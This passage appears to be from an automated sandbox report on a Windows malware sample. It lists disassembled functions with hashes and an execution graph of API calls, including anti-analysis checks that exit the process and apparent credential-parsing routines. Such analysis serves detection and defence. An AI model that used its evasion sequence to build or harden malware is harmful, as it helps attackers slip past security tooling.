                                                        • Instruction ID: 34e8bc77d22ddcdafc14714ce60d9b0db4004f50fe154a236d7873180d633bee
                                                        • Opcode Fuzzy Hash: c784227a34fd5b7084b2c87fc19ea1d0d793304ba4906a265f634d642bdce8b4
                                                        • Instruction Fuzzy Hash: 83F06274600124DFDB22AF65D40159D7BB0AF41748F8640EBF5045B3A1C77C6D54CFAA
                                                        Function 004350DB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Free
                                                        • String ID: 11@$FlsFree
                                                        • API String ID: 3978063606-2352678666
                                                        • Opcode ID: 6dffc1cdda050d1ef236ec52a9cd275bb2632aad14ca1d18400e2b4c69ec58df
                                                        • Instruction ID: c1727abd3399064533d4b72406d339915fd92446a3417b7bd4380397cab03c3a
                                                        • Opcode Fuzzy Hash: 6dffc1cdda050d1ef236ec52a9cd275bb2632aad14ca1d18400e2b4c69ec58df
                                                        • Instruction Fuzzy Hash: 0FE0E532F41218ABD714AF559C07A6EBB60DB48F15F14017BFE0557281DA794E1096CE
                                                        Function 00435085 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Alloc
                                                        • String ID: 11@$FlsAlloc
                                                        • API String ID: 2773662609-288891599
                                                        • Opcode ID: ba89461f714ec2f353eb854be2fff552b03e75bb0e63386cb5f1b0964f268f00
                                                        • Instruction ID: 656933edcbb05ac72b6cf25421a562d2aaaa3326236b7023487c433eafd234ee
                                                        • Opcode Fuzzy Hash: ba89461f714ec2f353eb854be2fff552b03e75bb0e63386cb5f1b0964f268f00
                                                        • Instruction Fuzzy Hash: 62E05C30B8170477D314AF518C03A6EB760DB0AB11F10017BFC0127280DDBD5E1085CE
                                                        Function 00429FC5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • try_get_function.LIBVCRUNTIME ref: 00429FDA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: try_get_function
                                                        • String ID: 11@$FlsAlloc
                                                        • API String ID: 2742660187-288891599
                                                        • Opcode ID: 8626dcbe6cdd30c54ada29f8a24cae781a39f5398ca56e55a922e5d7310b92a8
                                                        • Instruction ID: 02976f814a59a294967572ff2c8846d3634fef9e4185a681c56ac9216c02fddb
                                                        • Opcode Fuzzy Hash: 8626dcbe6cdd30c54ada29f8a24cae781a39f5398ca56e55a922e5d7310b92a8
                                                        • Instruction Fuzzy Hash: BDD0C231BC973663D5406B816D02B99BA048701FA3F110063F90CA1281D6994A1046CD
                                                        Function 004212DC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004212FB
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00421309
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                        • String ID: pThreadProxy
                                                        • API String ID: 1687795959-3651400591
                                                        • Opcode ID: d978fa9c7b04847c80681c11cf36977db16e70b896a80dd6198ffb22ffb34018
                                                        • Instruction ID: 5420a3ac49ee2b21aafe02425b7e31d130dadcb6d03c7143bde2fe2a0427303a
                                                        • Opcode Fuzzy Hash: d978fa9c7b04847c80681c11cf36977db16e70b896a80dd6198ffb22ffb34018
                                                        • Instruction Fuzzy Hash: 8FD05B71E0020896D700EBB9D806E4E77A85B10718F50417B7D14E6147DF78E508C6A8
                                                        Function 0041A897 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • Concurrency::details::ContextBase::CancellationBeaconStack::~CancellationBeaconStack.LIBCONCRT ref: 0041A8A1
                                                        • Hash.LIBCONCRT ref: 0041A8AE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: BeaconCancellation$Base::Concurrency::details::ContextHashStackStack::~
                                                        • String ID: +hB
                                                        • API String ID: 3232699325-4272926976
                                                        • Opcode ID: 7ad862fe756be090a11e09584eb2edb8185e7db7bb7af1f5538142d7ac1213cc
                                                        • Instruction ID: 63ff50f5f99ebaa442bb0d4aeec8a7224868785c63155d6932f4acb55241cc7c
                                                        • Opcode Fuzzy Hash: 7ad862fe756be090a11e09584eb2edb8185e7db7bb7af1f5538142d7ac1213cc
                                                        • Instruction Fuzzy Hash: 2DD0A73230451156C708772AF8019C9F761BF80710B11403FE455935518F3838AF869D
                                                        Function 0042AEAA Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,f(@,00000000), ref: 0042AF40
                                                        • GetLastError.KERNEL32 ref: 0042AF4E
                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0042AFA9
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: ByteCharMultiWide$ErrorLast
                                                        • String ID:
                                                        • API String ID: 1717984340-0
                                                        • Opcode ID: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
                                                        • Instruction ID: 120bd2143bdce8d71afc71d227a82de2ececf14487395c5eb9abd3a2316ebb2c
                                                        • Opcode Fuzzy Hash: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
                                                        • Instruction Fuzzy Hash: 00414830700621EFCF228F66E944B6BBBA4EF01714F95416BFC699B290D7388D01C79A

                                                        Execution Graph

                                                        Execution Coverage:6.5%
                                                        Dynamic/Decrypted Code Coverage:4.8%
                                                        Signature Coverage:1%
                                                        Total number of Nodes:1416
                                                        Total number of Limit Nodes:28
                                                        execution_graph 27583 409440 strlen malloc strcpy_s free std::exception::exception 27584 b304b7 88 API calls 27585 b30cb6 30 API calls 27654 41ce48 LeaveCriticalSection __initptd 27656 b26ebc VirtualProtect 27586 41b050 6 API calls 3 library calls 27625 b3cd90 173 API calls 2 library calls 27589 b3d0af RtlLeaveCriticalSection __initptd 27657 b332ae 22 API calls 27658 b3ae93 43 API calls ctype 27689 406f60 memcpy 27590 41dc60 atexit 27659 b30297 149 API calls 27690 410765 279 API calls 27660 417667 lstrcpy 27662 41b270 5 API calls 2 library calls 27591 b33823 StrCmpCA StrCmpCA StrCmpCA strtok_s 27627 b3118b strtok_s StrCmpCA strtok_s lstrlen lstrcpy 27628 b3cd8f 6 API calls 2 library calls 27593 b3102b StrCmpCA strtok_s 27595 b330f9 7 API calls 27596 41bc11 71 API calls 2 library calls 27634 b319e7 6 API calls 27635 b335e4 9 API calls 27568 7fb826 27569 7fb835 27568->27569 27572 7fbfc6 27569->27572 27573 7fbfe1 27572->27573 27574 7fbfea CreateToolhelp32Snapshot 27573->27574 27575 7fc006 Module32First 27573->27575 27574->27573 27574->27575 27576 7fb83e 27575->27576 27577 7fc015 27575->27577 27579 7fbc85 27577->27579 27580 7fbcb0 27579->27580 27581 7fbcf9 27580->27581 27582 7fbcc1 VirtualAlloc 27580->27582 27581->27581 27582->27581 27598 b3cce9 162 API calls ___crtGetStringTypeA 27599 b330d0 9 API calls 27602 b33823 10 API calls 27603 41ac2c 71 API calls 2 library calls 27693 b313c7 strtok_s strtok_s 27605 b3102b StrCmpCA StrCmpCA strtok_s 27607 4090c3 5 API calls allocator 27695 b29b37 7 API calls 27609 b31c35 110 API calls 27697 41abd0 free codecvt std::exception::_Tidy 27639 b31525 strtok_s strtok_s lstrlen lstrcpy ctype 27698 b2932a ??2@YAPAXI RaiseException allocator 27699 413916 91 API calls 2 library calls 27701 4183dc 15 API calls 27674 b315b3 18 API calls ctype 27613 4090e7 memcpy RaiseException codecvt __CxxThrowException@8 27676 41ceea SetUnhandledExceptionFilter 27703 b312eb strtok_s lstrlen lstrcpy 26125 4169f0 26168 402260 26125->26168 26142 417850 3 API calls 26143 416a30 26142->26143 26144 4178e0 3 API calls 26143->26144 26145 416a43 26144->26145 26301 41a9b0 26145->26301 26147 416a64 26148 41a9b0 4 API calls 26147->26148 26149 416a6b 26148->26149 26150 41a9b0 4 API calls 26149->26150 26151 416a72 26150->26151 26152 41a9b0 4 API calls 26151->26152 26153 416a79 26152->26153 26154 41a9b0 4 API calls 26153->26154 26155 416a80 26154->26155 26309 41a8a0 26155->26309 26157 416b0c 26313 416920 GetSystemTime 26157->26313 26159 416a89 26159->26157 26160 416ac2 OpenEventA 26159->26160 26162 416af5 CloseHandle Sleep 26160->26162 26163 416ad9 26160->26163 26165 416b0a 26162->26165 26167 416ae1 CreateEventA 26163->26167 26165->26159 26166 416b16 CloseHandle ExitProcess 26167->26157 26510 4045c0 17 API calls 26168->26510 26170 402274 26171 4045c0 34 API calls 26170->26171 26172 40228d 26171->26172 26173 4045c0 34 API calls 26172->26173 26174 4022a6 26173->26174 26175 4045c0 34 API calls 26174->26175 26176 4022bf 26175->26176 26177 4045c0 34 API calls 26176->26177 26178 4022d8 26177->26178 26179 4045c0 34 API calls 26178->26179 26180 4022f1 26179->26180 26181 4045c0 34 API calls 26180->26181 26182 40230a 26181->26182 26183 4045c0 34 API calls 26182->26183 26184 402323 26183->26184 26185 4045c0 34 API calls 26184->26185 26186 40233c 26185->26186 26187 4045c0 34 API calls 26186->26187 26188 402355 26187->26188 26189 4045c0 34 API calls 26188->26189 26190 40236e 26189->26190 26191 4045c0 34 API calls 26190->26191 26192 402387 26191->26192 26193 4045c0 34 API calls 26192->26193 26194 4023a0 26193->26194 26195 4045c0 34 API calls 26194->26195 26196 4023b9 26195->26196 26197 4045c0 34 API calls 26196->26197 26198 4023d2 26197->26198 26199 4045c0 34 API calls 26198->26199 26200 4023eb 26199->26200 26201 4045c0 34 API calls 26200->26201 26202 402404 26201->26202 26203 4045c0 34 API calls 26202->26203 26204 40241d 26203->26204 26205 4045c0 34 API calls 26204->26205 26206 402436 26205->26206 26207 4045c0 34 API calls 26206->26207 26208 40244f 26207->26208 26209 4045c0 34 API calls 26208->26209 26210 402468 26209->26210 26211 4045c0 34 API calls 26210->26211 26212 402481 26211->26212 26213 4045c0 34 API calls 26212->26213 26214 40249a 26213->26214 26215 4045c0 34 API calls 26214->26215 26216 4024b3 26215->26216 26217 4045c0 34 API calls 26216->26217 26218 4024cc 26217->26218 26219 4045c0 34 API calls 26218->26219 26220 4024e5 26219->26220 26221 4045c0 34 API calls 26220->26221 26222 4024fe 26221->26222 26223 4045c0 34 API calls 26222->26223 26224 402517 26223->26224 26225 4045c0 34 API calls 26224->26225 26226 402530 26225->26226 26227 4045c0 34 API calls 26226->26227 26228 402549 26227->26228 26229 4045c0 34 API calls 26228->26229 26230 402562 26229->26230 26231 4045c0 34 API calls 26230->26231 26232 40257b 26231->26232 26233 4045c0 34 API calls 26232->26233 26234 402594 26233->26234 26235 4045c0 34 API calls 26234->26235 26236 4025ad 26235->26236 26237 4045c0 34 API calls 26236->26237 26238 4025c6 26237->26238 26239 4045c0 34 API calls 26238->26239 26240 4025df 26239->26240 26241 4045c0 34 API calls 26240->26241 26242 4025f8 26241->26242 26243 4045c0 34 API calls 26242->26243 26244 402611 26243->26244 26245 4045c0 34 API calls 26244->26245 26246 40262a 26245->26246 26247 4045c0 34 API calls 26246->26247 26248 402643 26247->26248 26249 4045c0 34 API calls 26248->26249 26250 40265c 26249->26250 26251 4045c0 34 API calls 26250->26251 26252 402675 26251->26252 26253 4045c0 34 API calls 26252->26253 26254 40268e 26253->26254 26255 419860 26254->26255 26514 419750 GetPEB 26255->26514 26257 419868 26258 419a93 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 26257->26258 26259 41987a 26257->26259 26260 419af4 GetProcAddress 26258->26260 26261 419b0d 26258->26261 26262 41988c 21 API calls 26259->26262 26260->26261 26263 419b46 26261->26263 26264 419b16 GetProcAddress GetProcAddress 26261->26264 26262->26258 26265 419b68 26263->26265 26266 419b4f GetProcAddress 26263->26266 26264->26263 26267 419b71 GetProcAddress 26265->26267 26268 419b89 26265->26268 26266->26265 26267->26268 26269 416a00 26268->26269 26270 419b92 GetProcAddress GetProcAddress 26268->26270 26271 41a740 26269->26271 26270->26269 26272 41a750 26271->26272 26273 416a0d 26272->26273 26274 41a77e lstrcpy 26272->26274 26275 4011d0 26273->26275 26274->26273 26276 4011e8 26275->26276 26277 401217 26276->26277 26278 40120f ExitProcess 26276->26278 26279 401160 GetSystemInfo 26277->26279 26280 401184 26279->26280 26281 40117c ExitProcess 26279->26281 26282 401110 GetCurrentProcess VirtualAllocExNuma 26280->26282 26283 401141 ExitProcess 26282->26283 26284 401149 26282->26284 26515 4010a0 VirtualAlloc 26284->26515 26287 401220 26519 4189b0 26287->26519 26290 401249 __aulldiv 26291 40129a 26290->26291 26292 401292 ExitProcess 26290->26292 26293 416770 GetUserDefaultLangID 26291->26293 26294 4167d3 GetUserDefaultLCID 26293->26294 26295 416792 26293->26295 26294->26142 26295->26294 26296 4167c1 ExitProcess 26295->26296 26297 4167a3 ExitProcess 26295->26297 26298 4167b7 ExitProcess 26295->26298 26299 4167cb ExitProcess 26295->26299 26300 4167ad ExitProcess 26295->26300 26521 41a710 26301->26521 26303 41a9c1 lstrlenA 26305 41a9e0 26303->26305 26304 41aa18 26522 41a7a0 26304->26522 26305->26304 26307 41a9fa lstrcpy lstrcatA 26305->26307 26307->26304 26308 41aa24 26308->26147 26310 41a8bb 26309->26310 26311 41a90b 26310->26311 26312 41a8f9 lstrcpy 26310->26312 26311->26159 26312->26311 26526 416820 26313->26526 26315 41698e 26316 416998 sscanf 26315->26316 26555 41a800 26316->26555 26318 4169aa SystemTimeToFileTime SystemTimeToFileTime 26319 4169e0 26318->26319 26320 4169ce 26318->26320 26322 415b10 26319->26322 26320->26319 26321 4169d8 ExitProcess 26320->26321 26323 415b1d 26322->26323 26324 41a740 lstrcpy 26323->26324 26325 415b2e 26324->26325 26557 41a820 lstrlenA 26325->26557 26328 41a820 2 API calls 26329 415b64 26328->26329 26330 41a820 2 API calls 26329->26330 26331 415b74 26330->26331 26561 416430 26331->26561 26334 41a820 2 API calls 26335 415b93 26334->26335 26336 41a820 2 API calls 26335->26336 26337 415ba0 26336->26337 26338 41a820 2 API calls 26337->26338 26339 415bad 26338->26339 26340 41a820 2 API calls 26339->26340 26341 415bf9 26340->26341 26570 4026a0 26341->26570 26349 415cc3 26350 416430 lstrcpy 26349->26350 26351 415cd5 26350->26351 26352 41a7a0 lstrcpy 26351->26352 26353 415cf2 26352->26353 26354 41a9b0 4 API calls 26353->26354 26355 415d0a 26354->26355 26356 41a8a0 lstrcpy 26355->26356 26357 415d16 26356->26357 26358 41a9b0 4 API calls 26357->26358 26359 415d3a 26358->26359 26360 41a8a0 lstrcpy 26359->26360 26361 415d46 26360->26361 26362 41a9b0 4 API calls 26361->26362 26363 415d6a 26362->26363 26364 41a8a0 lstrcpy 26363->26364 26365 415d76 26364->26365 26366 41a740 lstrcpy 26365->26366 26367 415d9e 26366->26367 27296 417500 GetWindowsDirectoryA 26367->27296 26370 41a7a0 lstrcpy 26371 415db8 26370->26371 27306 404880 26371->27306 26373 415dbe 27452 4117a0 26373->27452 26375 415dc6 26376 41a740 lstrcpy 26375->26376 26377 415de9 26376->26377 26378 401590 lstrcpy 26377->26378 26379 415dfd 26378->26379 27472 405960 39 API calls codecvt 26379->27472 26381 415e03 27473 411050 strtok_s strtok_s lstrlenA lstrcpy 26381->27473 26383 415e0e 26384 41a740 lstrcpy 26383->26384 26385 415e32 26384->26385 26386 401590 lstrcpy 26385->26386 26387 415e46 26386->26387 27474 405960 39 API calls codecvt 26387->27474 26389 415e4c 27475 410d90 7 API calls 26389->27475 26391 415e57 26392 41a740 lstrcpy 26391->26392 26393 415e79 26392->26393 26394 401590 lstrcpy 26393->26394 26395 415e8d 26394->26395 27476 405960 39 API calls codecvt 26395->27476 26397 415e93 27477 410f40 strtok_s StrCmpCA strtok_s lstrlenA lstrcpy 26397->27477 26399 415e9e 26400 401590 lstrcpy 26399->26400 26401 415eb5 26400->26401 27478 411a10 121 API calls 26401->27478 26403 415eba 26404 41a740 lstrcpy 26403->26404 26405 415ed6 26404->26405 27479 404fb0 8 API calls 26405->27479 26407 415edb 26408 401590 lstrcpy 26407->26408 26409 415f5b 26408->26409 27480 410740 292 API calls 26409->27480 26411 415f60 26412 41a740 lstrcpy 26411->26412 26413 415f86 26412->26413 26414 401590 lstrcpy 26413->26414 26415 415f9a 26414->26415 27481 405960 39 API calls codecvt 26415->27481 26417 415fa0 27482 411170 strtok_s StrCmpCA strtok_s lstrlenA lstrcpy 26417->27482 26419 415fab 26420 401590 lstrcpy 26419->26420 26421 415feb 26420->26421 27483 401e80 67 API calls 26421->27483 26423 415ff0 26424 416000 26423->26424 26425 416092 26423->26425 26427 41a740 lstrcpy 26424->26427 26426 41a7a0 lstrcpy 26425->26426 26428 4160a5 26426->26428 26429 416020 26427->26429 26431 401590 lstrcpy 26428->26431 26430 401590 lstrcpy 26429->26430 26432 416034 26430->26432 26433 4160b9 26431->26433 27484 405960 39 API calls codecvt 26432->27484 27487 405960 39 API calls codecvt 26433->27487 26436 4160bf 27488 413560 36 API calls 26436->27488 26437 41603a 27485 4112d0 21 API calls codecvt 26437->27485 26440 41608a 26443 41610b 26440->26443 26445 401590 lstrcpy 26440->26445 26441 416045 26442 401590 lstrcpy 26441->26442 26444 416085 26442->26444 26447 416130 26443->26447 26450 401590 lstrcpy 26443->26450 27486 413dc0 75 API calls 26444->27486 26449 4160e7 26445->26449 26448 416155 26447->26448 26452 401590 lstrcpy 26447->26452 26454 41617a 26448->26454 26459 401590 lstrcpy 26448->26459 27489 4140b0 64 API calls codecvt 26449->27489 26451 41612b 26450->26451 27491 414780 116 API calls codecvt 26451->27491 26457 416150 26452->26457 26455 41619f 26454->26455 26460 401590 lstrcpy 26454->26460 26461 4161c4 26455->26461 26466 401590 lstrcpy 26455->26466 27492 414bb0 67 API calls codecvt 26457->27492 26458 4160ec 26463 401590 lstrcpy 26458->26463 26464 416175 26459->26464 26465 41619a 26460->26465 26468 4161e9 26461->26468 26474 401590 lstrcpy 26461->26474 26467 416106 26463->26467 27493 414d70 75 API calls 26464->27493 27494 414f40 69 API calls codecvt 26465->27494 26472 4161bf 26466->26472 27490 415100 71 API calls 26467->27490 26470 416210 26468->26470 26475 401590 lstrcpy 26468->26475 26476 416220 26470->26476 26477 4162b3 26470->26477 27495 407710 125 API calls codecvt 26472->27495 26479 4161e4 26474->26479 26480 416209 26475->26480 26482 41a740 lstrcpy 26476->26482 26481 41a7a0 lstrcpy 26477->26481 27496 415050 67 API calls codecvt 26479->27496 27497 419010 54 API calls codecvt 26480->27497 26485 4162c6 26481->26485 26486 416241 26482->26486 26487 401590 lstrcpy 26485->26487 26488 401590 lstrcpy 26486->26488 26489 4162da 26487->26489 26490 416255 26488->26490 27501 405960 39 API calls codecvt 26489->27501 27498 405960 39 API calls codecvt 26490->27498 26493 4162e0 27502 413560 36 API calls 26493->27502 26494 41625b 27499 4112d0 21 API calls codecvt 26494->27499 26497 416266 26499 401590 lstrcpy 26497->26499 26498 4162ab 26501 41a7a0 lstrcpy 26498->26501 26500 4162a6 26499->26500 27500 413dc0 75 API calls 26500->27500 26502 4162fc 26501->26502 26504 401590 lstrcpy 26502->26504 26505 416310 26504->26505 27503 405960 39 API calls codecvt 26505->27503 26507 41631c 26509 416338 26507->26509 27504 416630 9 API calls codecvt 26507->27504 26509->26166 26511 404697 26510->26511 26512 4046ac 11 API calls 26511->26512 26513 40474f 6 API calls 26511->26513 26512->26511 26513->26170 26514->26257 26517 4010c2 codecvt 26515->26517 26516 4010fd 26516->26287 26517->26516 26518 4010e2 VirtualFree 26517->26518 26518->26516 26520 401233 GlobalMemoryStatusEx 26519->26520 26520->26290 26521->26303 26523 41a7c2 26522->26523 26524 41a7ec 26523->26524 26525 41a7da lstrcpy 26523->26525 26524->26308 26525->26524 26527 41a740 lstrcpy 26526->26527 26528 416833 26527->26528 26529 41a9b0 4 API calls 26528->26529 26530 416845 26529->26530 26531 41a8a0 lstrcpy 26530->26531 26532 41684e 26531->26532 26533 41a9b0 4 API calls 26532->26533 26534 416867 26533->26534 26535 41a8a0 lstrcpy 26534->26535 26536 416870 26535->26536 26537 41a9b0 4 API calls 26536->26537 26538 41688a 26537->26538 26539 41a8a0 lstrcpy 26538->26539 26540 416893 26539->26540 26541 41a9b0 4 API calls 26540->26541 26542 4168ac 26541->26542 26543 41a8a0 lstrcpy 26542->26543 26544 4168b5 26543->26544 26545 41a9b0 4 API calls 26544->26545 26546 4168cf 26545->26546 26547 41a8a0 lstrcpy 26546->26547 26548 4168d8 26547->26548 26549 41a9b0 4 API calls 26548->26549 26550 4168f3 26549->26550 26551 41a8a0 lstrcpy 26550->26551 26552 4168fc 26551->26552 26553 41a7a0 lstrcpy 26552->26553 26554 416910 26553->26554 26554->26315 26556 41a812 26555->26556 26556->26318 26558 41a83f 26557->26558 26559 415b54 26558->26559 26560 41a87b lstrcpy 26558->26560 26559->26328 26560->26559 26562 41a8a0 lstrcpy 26561->26562 26563 416443 26562->26563 26564 41a8a0 lstrcpy 26563->26564 26565 416455 26564->26565 26566 41a8a0 lstrcpy 26565->26566 26567 416467 26566->26567 26568 41a8a0 lstrcpy 26567->26568 26569 415b86 26568->26569 26569->26334 26571 4045c0 34 API calls 26570->26571 26572 4026b4 26571->26572 26573 4045c0 34 API calls 26572->26573 26574 4026d7 26573->26574 26575 4045c0 34 API calls 26574->26575 26576 4026f0 26575->26576 26577 4045c0 34 API calls 26576->26577 26578 402709 26577->26578 26579 4045c0 34 API calls 26578->26579 26580 402736 26579->26580 26581 4045c0 34 API calls 26580->26581 26582 40274f 26581->26582 26583 4045c0 34 API calls 26582->26583 26584 402768 26583->26584 26585 4045c0 34 API calls 26584->26585 26586 402795 26585->26586 26587 4045c0 34 API calls 26586->26587 26588 4027ae 26587->26588 26589 4045c0 34 API calls 26588->26589 26590 4027c7 26589->26590 26591 4045c0 34 API calls 26590->26591 26592 4027e0 26591->26592 26593 4045c0 34 API calls 26592->26593 26594 4027f9 26593->26594 26595 4045c0 34 API calls 26594->26595 26596 402812 26595->26596 26597 4045c0 34 API calls 26596->26597 26598 40282b 26597->26598 26599 4045c0 34 API calls 26598->26599 26600 402844 26599->26600 26601 4045c0 34 API calls 26600->26601 26602 40285d 26601->26602 26603 4045c0 34 API calls 26602->26603 26604 402876 26603->26604 26605 4045c0 34 API calls 26604->26605 26606 40288f 26605->26606 26607 4045c0 34 API calls 26606->26607 26608 4028a8 26607->26608 26609 4045c0 34 API calls 26608->26609 26610 4028c1 26609->26610 26611 4045c0 34 API calls 26610->26611 26612 4028da 26611->26612 26613 4045c0 34 API calls 26612->26613 26614 4028f3 26613->26614 26615 4045c0 34 API calls 26614->26615 26616 40290c 26615->26616 26617 4045c0 34 API calls 26616->26617 26618 402925 26617->26618 26619 4045c0 34 API calls 26618->26619 26620 40293e 26619->26620 26621 4045c0 34 API calls 26620->26621 26622 402957 26621->26622 26623 4045c0 34 API calls 26622->26623 26624 402970 26623->26624 26625 4045c0 34 API calls 26624->26625 26626 402989 26625->26626 26627 4045c0 34 API calls 26626->26627 26628 4029a2 26627->26628 26629 4045c0 34 API calls 26628->26629 26630 4029bb 26629->26630 26631 4045c0 34 API calls 26630->26631 26632 4029d4 26631->26632 26633 4045c0 34 API calls 26632->26633 26634 4029ed 26633->26634 26635 4045c0 34 API calls 26634->26635 26636 402a06 26635->26636 26637 4045c0 34 API calls 26636->26637 26638 402a1f 26637->26638 26639 4045c0 34 API calls 26638->26639 26640 402a38 26639->26640 26641 4045c0 34 API calls 26640->26641 26642 402a51 26641->26642 26643 4045c0 34 API calls 26642->26643 26644 402a6a 26643->26644 26645 4045c0 34 API calls 26644->26645 26646 402a83 26645->26646 26647 4045c0 34 API calls 26646->26647 26648 402a9c 26647->26648 26649 4045c0 34 API calls 26648->26649 26650 402ab5 26649->26650 26651 4045c0 34 API calls 26650->26651 26652 402ace 26651->26652 26653 4045c0 34 API calls 26652->26653 26654 402ae7 26653->26654 26655 4045c0 34 API calls 26654->26655 26656 402b00 26655->26656 26657 4045c0 34 API calls 26656->26657 26658 402b19 26657->26658 26659 4045c0 34 API calls 26658->26659 26660 402b32 26659->26660 26661 4045c0 34 API calls 26660->26661 26662 402b4b 26661->26662 26663 4045c0 34 API calls 26662->26663 26664 402b64 26663->26664 26665 4045c0 34 API calls 26664->26665 26666 402b7d 26665->26666 26667 4045c0 34 API calls 26666->26667 26668 402b96 26667->26668 26669 4045c0 34 API calls 26668->26669 26670 402baf 26669->26670 26671 4045c0 34 API calls 26670->26671 26672 402bc8 26671->26672 26673 4045c0 34 API calls 26672->26673 26674 402be1 26673->26674 26675 4045c0 34 API calls 26674->26675 26676 402bfa 26675->26676 26677 4045c0 34 API calls 26676->26677 26678 402c13 26677->26678 26679 4045c0 34 API calls 26678->26679 26680 402c2c 26679->26680 26681 4045c0 34 API calls 26680->26681 26682 402c45 26681->26682 26683 4045c0 34 API calls 26682->26683 26684 402c5e 26683->26684 26685 4045c0 34 API calls 26684->26685 26686 402c77 26685->26686 26687 4045c0 34 API calls 26686->26687 26688 402c90 26687->26688 26689 4045c0 34 API calls 26688->26689 26690 402ca9 26689->26690 26691 4045c0 34 API calls 26690->26691 26692 402cc2 26691->26692 26693 4045c0 34 API calls 26692->26693 26694 402cdb 26693->26694 26695 4045c0 34 API calls 26694->26695 26696 402cf4 26695->26696 26697 4045c0 34 API calls 26696->26697 26698 402d0d 26697->26698 26699 4045c0 34 API calls 26698->26699 26700 402d26 26699->26700 26701 4045c0 34 API calls 26700->26701 26702 402d3f 26701->26702 26703 4045c0 34 API calls 26702->26703 26704 402d58 26703->26704 26705 4045c0 34 API calls 26704->26705 26706 402d71 26705->26706 26707 4045c0 34 API calls 26706->26707 26708 402d8a 26707->26708 26709 4045c0 34 API calls 26708->26709 26710 402da3 26709->26710 26711 4045c0 34 API calls 26710->26711 26712 402dbc 26711->26712 26713 4045c0 34 API calls 26712->26713 26714 402dd5 26713->26714 26715 4045c0 34 API calls 26714->26715 26716 402dee 26715->26716 26717 4045c0 34 API calls 26716->26717 26718 402e07 26717->26718 26719 4045c0 34 API calls 26718->26719 26720 402e20 26719->26720 26721 4045c0 34 API calls 26720->26721 26722 402e39 26721->26722 26723 4045c0 34 API calls 26722->26723 26724 402e52 26723->26724 26725 4045c0 34 API calls 26724->26725 26726 402e6b 26725->26726 26727 4045c0 34 API calls 26726->26727 26728 402e84 26727->26728 26729 4045c0 34 API calls 26728->26729 26730 402e9d 26729->26730 26731 4045c0 34 API calls 26730->26731 26732 402eb6 26731->26732 26733 4045c0 34 API calls 26732->26733 26734 402ecf 26733->26734 26735 4045c0 34 API calls 26734->26735 26736 402ee8 26735->26736 26737 4045c0 34 API calls 26736->26737 26738 402f01 26737->26738 26739 4045c0 34 API calls 26738->26739 26740 402f1a 26739->26740 26741 4045c0 34 API calls 26740->26741 26742 402f33 26741->26742 26743 4045c0 34 API calls 26742->26743 26744 402f4c 26743->26744 26745 4045c0 34 API calls 26744->26745 26746 402f65 26745->26746 26747 4045c0 34 API calls 26746->26747 26748 402f7e 26747->26748 26749 4045c0 34 API calls 26748->26749 26750 402f97 26749->26750 26751 4045c0 34 API calls 26750->26751 26752 402fb0 26751->26752 26753 4045c0 34 API calls 26752->26753 26754 402fc9 26753->26754 26755 4045c0 34 API calls 26754->26755 26756 402fe2 26755->26756 26757 4045c0 34 API calls 26756->26757 26758 402ffb 26757->26758 26759 4045c0 34 API calls 26758->26759 26760 403014 26759->26760 26761 4045c0 34 API calls 26760->26761 26762 40302d 26761->26762 26763 4045c0 34 API calls 26762->26763 26764 403046 26763->26764 26765 4045c0 34 API calls 26764->26765 26766 40305f 26765->26766 26767 4045c0 34 API calls 26766->26767 26768 403078 26767->26768 26769 4045c0 34 API calls 26768->26769 